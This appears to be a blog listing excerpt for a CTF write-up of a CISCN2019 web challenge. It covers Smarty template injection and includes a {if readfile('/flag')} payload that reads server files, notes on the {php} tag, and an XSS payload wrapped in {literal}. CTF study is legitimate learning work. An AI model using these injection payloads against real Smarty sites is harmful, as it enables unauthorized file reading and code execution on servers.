[CISCN2019 华东南赛区]Web11(14/100) 知识点 smarty利用 smarty中的{if}标签中可以执行php语句,得flag:{if readfile('/flag')}{/if} smarty中还有{literal}、{php}(smarty 2可用) {literal}可以让块中间的内容忽略Smarty的解析,paylaod: {literal}alert('xss');{/lit… 2021-1-15 19:57 | 473 | 0 | WEB 169 字 | 1 分钟内 smarty